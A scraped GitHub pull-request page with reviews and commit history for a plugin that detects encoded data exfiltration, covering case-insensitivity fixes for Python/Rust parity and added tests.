crivetimihai · 2026-03-30T20:45:07Z

Review — rebased, reviewed, and fixed

Rebased onto main, resolved the .secrets.baseline conflict, and reviewed all code thoroughly.

Bugs fixed (commit `9cbbcad`)

Parity bug: _extra_keywords_bytes not lowercased — _contains_sensitive_keywords lowercases decoded content, but extra keywords from config were stored as-is. Mixed-case configs (e.g. "WatsonX_Cred") silently failed. Rust already lowercases correctly.
Parity bug: _extra_hints_lower not lowercased — same issue for egress hints. Variable was named _extra_hints_lower but didn't actually lowercase. Rust lowercases correctly.
Docstring listed 2 of 3 hooks — updated to include resource_post_fetch.

Test coverage → 100%

Added 4 tests: mixed-case keyword/hint regression, max_recursion_depth guard, JSON dedup path (Unicode-escaped base64).
Added # pragma: no cover to Rust-only code paths.
100% differential coverage on encoded_exfil_detector.py (up from 92%).

Review notes (no issues)

Design is solid and consistent with sibling plugins (PII filter, secrets detection).
Scoring system well-designed with clear configurable thresholds.
Redaction uses correct reverse-order offset-preserving edits.
JSON-within-strings dedup prevents double-counting.
No security issues — finding metadata only shows 24-char encoded previews, capped at 10 findings.
Rust implementation is a faithful port with identical scoring logic.
All 90 tests pass, 2 xfail for documented limitations.

crivetimihai

LGTM — rebased, fixed two parity bugs (case-insensitive matching for extra keywords/hints), achieved 100% differential test coverage. Ready to merge.

Signed-off-by: Mihai Criveti <crivetimihai@gmail.com>

gandhipratik203 requested review from crivetimihai, dima-zakharov, kevalmahajan, lucarlig and madhav165 as code owners March 29, 2026 00:02

gandhipratik203 closed this Mar 29, 2026

gandhipratik203 reopened this Mar 29, 2026

gandhipratik203 changed the base branch from feat/rate-limiter-rust to main March 29, 2026 00:09

gandhipratik203 requested review from araujof, jonpspri and terylt as code owners March 29, 2026 00:09

gandhipratik203 changed the title ~~feat(encoded-exfil): harden plugin for production — TDD, Rust parity, nested detection~~ feat(encoded-exfil): harden plugin for production, Rust parity, nested detection Mar 29, 2026

gandhipratik203 self-assigned this Mar 29, 2026

gandhipratik203 changed the title ~~feat(encoded-exfil): harden plugin for production, Rust parity, nested detection~~ feat(encoded-exfil): production-ready encoded exfiltration detection with full Rust parity Mar 29, 2026

gandhipratik203 force-pushed the feat/encoded-exfil-hardening branch 2 times, most recently from 5d7ba49 to 2f54db3 Compare March 29, 2026 12:36

crivetimihai added enhancement New feature or request COULD P3: Nice-to-have features with minimal impact if left out; included if time permits plugins security Improves security labels Mar 29, 2026

crivetimihai added this to the Release 1.0.0 milestone Mar 29, 2026

gandhipratik203 force-pushed the feat/encoded-exfil-hardening branch 4 times, most recently from 1a31311 to 2cfc137 Compare March 29, 2026 16:42

gandhipratik203 changed the title ~~feat(encoded-exfil): production-ready encoded exfiltration detection with full Rust parity~~ feat(encoded-exfil): test, harden, and document encoded exfiltration detection plugin Mar 29, 2026

gandhipratik203 added wxo wxo integration release-fix Critical bugfix required for the release and removed COULD P3: Nice-to-have features with minimal impact if left out; included if time permits labels Mar 30, 2026

gandhipratik203 dismissed dima-zakharov’s stale review via 2d35915 March 30, 2026 10:08

gandhipratik203 commented Mar 30, 2026

View reviewed changes

gandhipratik203 requested a review from lucarlig March 30, 2026 10:57

lucarlig requested changes Mar 30, 2026

View reviewed changes

gandhipratik203 requested a review from dima-zakharov March 30, 2026 12:28

gandhipratik203 requested a review from lucarlig March 30, 2026 13:11

lucarlig previously approved these changes Mar 30, 2026

View reviewed changes

dima-zakharov previously approved these changes Mar 30, 2026

View reviewed changes

gandhipratik203 and others added 11 commits March 30, 2026 21:00

chore: regenerate detect-secrets baseline after rebase onto main

62ebf5b

Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>

fix: mark compare_performance.py as executable to match shebang

142160e

Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>

fix: resolve CI lint and Rust fmt failures

ed99f2f

- Replace object.__setattr__() with setattr() to fix ruff PLC2801 - Rename unused __context to _context to fix vulture - Run cargo fmt on Rust test code Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>

chore: audit new detect-secrets baseline entries as false positives

dfeb25c

Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>

fix: resolve CI clippy and pylint failures

1696ea9

- Collapse nested if statements in Rust to satisfy clippy collapsible_if - Add pylint disable for model_post_init arguments-differ Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>

crivetimihai dismissed stale reviews from dima-zakharov and lucarlig via 9cbbcad March 30, 2026 20:44

crivetimihai force-pushed the feat/encoded-exfil-hardening branch from afab86f to 9cbbcad Compare March 30, 2026 20:44

crivetimihai previously approved these changes Mar 30, 2026

View reviewed changes

baseline

3f943d2

Signed-off-by: Mihai Criveti <crivetimihai@gmail.com>

crivetimihai dismissed their stale review via 3f943d2 March 30, 2026 23:22

crivetimihai merged commit 1404dbf into main Mar 30, 2026
33 checks passed

crivetimihai deleted the feat/encoded-exfil-hardening branch March 30, 2026 23:34

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

feat(encoded-exfil): test, harden, and document encoded exfiltration detection plugin#3906

feat(encoded-exfil): test, harden, and document encoded exfiltration detection plugin#3906
crivetimihai merged 12 commits intomainfrom
feat/encoded-exfil-hardening

gandhipratik203 commented Mar 29, 2026 •

edited

Loading

Uh oh!

crivetimihai commented Mar 29, 2026

Uh oh!

gandhipratik203 left a comment •

edited

Loading

Uh oh!

lucarlig left a comment

Uh oh!

gandhipratik203 commented Mar 30, 2026

Uh oh!

gandhipratik203 commented Mar 30, 2026

Uh oh!

dima-zakharov left a comment •

edited

Loading

Uh oh!

crivetimihai commented Mar 30, 2026

Uh oh!

crivetimihai left a comment

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

4 participants

Conversation

gandhipratik203 commented Mar 29, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Summary

Gaps closed

Python plugin

Rust implementation

Additional hardening

Architecture

Test results

Test results summary

1. Unit test breakdown

2. Rust unit tests

3. Python vs Rust performance comparison

Limitations

Uh oh!

crivetimihai commented Mar 29, 2026

Uh oh!

gandhipratik203 left a comment • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Choose a reason for hiding this comment

Uh oh!

lucarlig left a comment

Choose a reason for hiding this comment

Uh oh!

gandhipratik203 commented Mar 30, 2026

Uh oh!

gandhipratik203 commented Mar 30, 2026

Uh oh!

dima-zakharov left a comment • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Choose a reason for hiding this comment

Commit Review: afab86f

Summary

Verdict: ✅ Approve

Changes Reviewed

1. Python Implementation (encoded_exfil_detector.py)

Change A: JSON Type Mutation Prevention (Lines 420-447)

Change B: Dict Key Scanning (Lines 451-457)

2. Rust Implementation (lib.rs)

Change: Mirrors Python Logic

3. Test Coverage (test_encoded_exfil_detector.py)

New Test 1: Type Preservation

New Test 2: Dict Key Detection

Updated Test: JSON Heuristic

Findings

✅ Strengths

✅ No Issues Found

Security Impact Assessment

Before This Commit

After This Commit

Recommended Actions

None Required

Conclusion

Uh oh!

crivetimihai commented Mar 30, 2026

Review — rebased, reviewed, and fixed

Bugs fixed (commit 9cbbcad)

Test coverage → 100%

Review notes (no issues)

Uh oh!

crivetimihai left a comment

Choose a reason for hiding this comment

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

4 participants

gandhipratik203 commented Mar 29, 2026 •

edited

Loading

gandhipratik203 left a comment •

edited

Loading

dima-zakharov left a comment •

edited

Loading

Commit Review: `afab86f`

1. Python Implementation (`encoded_exfil_detector.py`)

2. Rust Implementation (`lib.rs`)

3. Test Coverage (`test_encoded_exfil_detector.py`)

Bugs fixed (commit `9cbbcad`)